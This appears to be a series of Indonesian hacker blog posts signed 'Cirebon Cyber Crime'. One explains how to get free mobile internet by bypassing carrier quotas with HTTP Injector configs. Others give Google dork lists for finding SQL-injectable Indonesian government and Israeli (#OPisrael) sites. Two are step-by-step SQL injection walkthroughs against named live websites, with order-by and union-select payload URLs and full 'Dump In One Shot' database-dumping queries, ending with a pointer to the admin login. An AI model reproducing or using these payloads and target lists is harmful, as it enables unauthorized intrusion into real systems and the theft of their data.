INTERNET GRATIS AXIS KZL SOCIAL MEDIA

            Hallo bertemu lagi dengan saya Fathony Injector , yang tamvannya gak abis – abis hahaha... kalau berbicara masalah gratis itu menggiurkan, apalagi trik yang akan saya bahas kali ini.. simak baik” :

Bahan – bahan :

11.     Hp Android OS jelly bean / kitkat.

22. Kartu axis yg masih aktif dan berisi pulsa 5 rb ( untuk paket KZL Sosmed 1minggu )

33. Aplikasi HTTP INJECTOR bisa kalian download KLIK DISINI

44. Config bisa kalian download  KLIK DISINI

Jika bahan bahan tersedia mari kita simak langkah – langkahnya :

11.  Ketik *123# pilih paket KZL

2. Pilih mingguan

 3. Pilih sosmed 7 hr 4900

 4. lalu beli paketnya

 5. Install Aplikasi HTTP INJECTOR yg telah anda download tadi. terus buka HTTP INJECTOR nya. lalu pilih menu yg dipojok kanan atas sebelah icon pengturan, sudah saya tandai.

 6. pilih CONFIG

 7. Lalu pilih IMPORT CONFIG,

 8. Nah disini kalian pilih config yang kalian download tadi diatas, formatnya .ehi. biasanya di folder kartu SD / DOWNLOAD.

 9. setelah pilih confignya, centang DNS ( DNS GOOGLE ) dan SSH nya. sudah saya tandai.

 10. lalu klik MULAI !!, tunggu hingga terhubung..

 11. Jika sudah terhubung langsung internetan saja, JANGAN CLOSE APLIKASINYA, MINIMALKAN SAJA. dan nikmati free inet kemana ajah dan ngapain ajah, bisa browsing , BBM, CHATTING, YOUTUBE, STREAMING, DOWNLOAD , SEPUASNYA....

2.   SELAMAT MENIKMATI DAN JIKA GAGAL TERHUBUNG SILAHKAN INBOX SAYA http://m.facebook.com/rivan.m.siahaan   ..  salam hacking :)

Continue reading

Dork Fresh SQL Goverment Indonesia

langsung saja sobat ;)

inurl:.go.id /index.php?id=
inurl:.go.id /contact.php?id=
inurl:.go.id /index.asp?id=
inurl:.go.id /email.php?id=
inurl:.go.id /main.php?id=
inurl:.go.id /about.php?id=
inurl:.go.id /page.php?id=
inurl:.go.id /hal.php?id=
inurl:.go.id /mobile.php?id=
inurl:.go.id /kontak.php?id=
inurl:.go.id /.php?id=

semoga bermanfaat ;)

Continue reading

Dork SQL injection 2016 ( #OPisrael )

Oke saya Mr.chucky a.k.a Fathony akan membagikan dork website israel method SQL injection. jika kalian tidak tau SQL injection tanyakan pada google :D . langsung saja :

inurl:/index.asp?id= site:.gov.il
inurl:/index.php?id= site:.gov.il
inurl:/home.php?id= site:.il
inurl:/list.php?id= site:.il
inurl:/contact.php?id= site:.il
inurl:/show.php?id= site:.il
inurl:/payment.php?id= site:.il
inurl:/post.php?id= site:.il
inurl:.php?id= site:.org.il
inurl:/content.php?id= site:.il
inurl:/mobile.php?id= site:.il
inurl:/manager.php?id= site:.il
inurl:/about.php?id= site:.il
inurl:/data.php?id= site:.il
inurl:/main.php?id= site:.il
inurl:/page.php?id= site:.il

segitu ajah dulu yo :* good job , selamat dumper kawan .
salam Mr.chucky - Cirebon Cyber Crime

Continue reading

Dump In One Shot ( part 2 )

Hallo , assalamualaikum .

masih ingat apa itu DIOS ? ( Dump In One Shot ) yaitu Query SQL injection untuk Dump data dalam satu kali tindakan. ini tutorial yang ke dua :

1. Tentukan target

disini saya ada target live :

http://www.icdcprague.org/index.php?id=10

2. Beri String

http://www.icdcprague.org/index.php?id=10'

muncul pesan 

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in/www/sites/2/site8082/public_html/index.php on line 51

3. Cari Jumlah tabel count

http://www.icdcprague.org/index.php?id=-10'+order+by+1--+ no respon

http://www.icdcprague.org/index.php?id=-10'+order+by+2--+ no respon

http://www.icdcprague.org/index.php?id=-10'+order+by+6--+ no respon

http://www.icdcprague.org/index.php?id=-10'+order+by+7--+ muncul pesan errornya.

Berarti tabel errornya count nya sampai 6, dikarenakan 7 error.

4. Cari Column Count nya

http://www.icdcprague.org/index.php?id=-10'+union+select+1,2,3,4,5,6--+

muncul column count nya yaitu angka 4.

5. Beri query DIOS

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns) 
where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,table_schema,' :: ',table_name,' :: ',column_name))))a)

Muncul deh :D

lanjut eksekusi .

sekian dan terima kasih , semoga tutorial ini bermanfaat,

wassalamualaikum

Continue reading

Langkah Pertama Untuk Belajar SQL Manual

Halo apa kabar sob?. ketemu lagi dengan saya Mr.chucky a.k.a Fathony hehe . Kali ini saya akan menjelaskan tentang Langkah-langkah yang harus kalian cermati dalam belajar SQL manual. Banyak orang yang chat saya di facebook, " om , bagaimana sih caranya main SQL manual? ". nah kali ini saya akan bahas disini yuk cekidot ..

1. Harus Tahu Apa Itu SQL Manual

adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.Yaitu dilakukan dengan secara manual.

2. Apa Sajakah Perlengkapan Yang Harus Dipersiapkan

    a. Dork SQL injection

    b. Google.com

    c. Kemampuan ( SKILL )

    d. Hexa binary

3. Langkah - Langkah SQL Manual

Langkah-langkah SQL manual mungkin sedikit sulit bagi yang baru belajar, karena mereka tidak tahu darimana kita harus mulai. jadi bisa kalian lihat DISINI

Oke cukup sekian dari saya , mungkin bisa bermanfaat bagi kalian yang ingin belajar SQL manual.

salam hacking -/\-

Continue reading

Dork SQL injection Terbaru 2016

Hi kawan , apa kabar ? ketemu lagi dengan saya. hehe ..
kalian sudah tau kan definisi tentang Dork ? lanjut ajah , ini daftar Dork terbaru 2016 cekidott broo ..

inurl:/index.php?en=
inurl:/coment.php?id=
inurl:/catid.php?id=
inurl:/post.php?id=
inurl:/gambar.php?id=
inurl:/discount.php?id=
inurl:/hal.php?id=
inurl:/public.php?id=
inurl:/pages.php?id=
inurl:/chat.php?id=

Segitu ajah dulu yah hehe , semoga bermanfaat .
salam hacking -/\-

Continue reading

DIOS ( Dump In One Shot )

Dalam SQL manual ini ada yang nama nya Query DIOS (Dump In One Shot) yang artinya Dump dalam satu tindakkan . jadi disini kita bisa mengetahui semua tabel" dan column menyeluruh dengan satu tindakkan. langsung saja yah kawan.

1. Disini saya sudah mempunyai target VULN SQLi.

http://bbspeb.com/main/customer.php?id=43'

2. kita lakukan Order By seperti biasa.


http://bbspeb.com/main/customer.php?id=-43 order by 1--+  ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 2--+  ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 3--+  ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 4--+  ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 5--+  ( normal )
http://bbspeb.com/main/customer.php?id=-43 order by 6--+   ( error )

berarti tabel count nya yang NORMAL sampai 5 .

3. lalu lakukan Union Select seperti biasa.

http://bbspeb.com/main/customer.php?id=-43 union select 1,2,3,4,5--+
Angka ajaibnya yang muncul adalah nomer 4

lalu beri query DIOS dibawah pada angka ajaib yang keluar tersebut.



(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')',column_name), (column_name))))))a)


copy DIOS diatas , lalu pastekan di angka ajaib tersebut lalu ENTER .

Muncul semua deh ^_^ .. tanpa harus capek" membuka satu" table nya.
keterangan :
sebelah tanda :: seperti contoh disitu ada category itu TABLE nya.
dan dibawah itu adalah column nya :)

4. selanjutnya Dump column yang kamu inginkan, kalo dump untuk melihat isi column nya cukup dengan cara seperti biasa saja lah :)

5. Tinggal menuju Login Admin nya deh.

Terima kasih semoga bermanfaat.
Salam hacking

Continue reading